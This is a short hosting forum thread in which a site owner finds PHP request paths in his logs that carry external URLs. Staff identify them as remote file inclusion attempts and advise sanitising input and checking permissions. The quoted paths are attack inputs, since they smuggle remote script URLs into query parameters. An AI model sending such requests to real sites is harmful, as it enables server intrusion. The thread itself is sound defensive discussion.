Url Question - Scripting Related, I Think

[TheMovieman]

I've noticed when looking at my latest visitors via cpanel that some of them have another site URL attached to the end of some of my pages.

 

Here's an example (I've removed the site name but if it helps, I could post it later or PM it or something):

 

/reviews/2006/index.php?view=page&pagename=http://www.**SITENAME**.com/blog/wp.rss.txt??

 

/reviews/DVD/read.php?id=http://**SITENAME2**.ru/images/cs.txt?

 

/reviews/movie/read.php?id=http://**SITENAME3**.ru/images/cs.txt?

 

/reviews/DVD/read.php?id=http://**SITENAME4**.io/pb.php?

 

Each of those are different sites.

 

When clicking on the links, it doesn't take me to those sites, just gives me my 404 error or loads a blank template (which is mine).

 

Should I be worried or is this normal?

[TCH-Bruce]

I've seen them in my logs before. I never really paid much attention to them.

[TCH-Dick]

Someone is trying to gain access your site by remotely including scripts to upload files for a number of nasty uses. For the most part we block attempts such as these but we can't always catch everything.

You should insure your scripts are secure and sanitize any data passed via a URL, also make sure you are not using any open permissions.

 

I would go ahead and open a ticket to the help desk asking for a review of your files to insure nothing has been compromised.

[TheMovieman]

I just checked my MySQL Permissions and somehow the user account I created specifically to just select the data had all its permissions checked... I don't know how that happened since I have another user account I use to do all the other things.

 

I'll open a ticket and have them check and make sure everything is OK.

 

Thanks guys.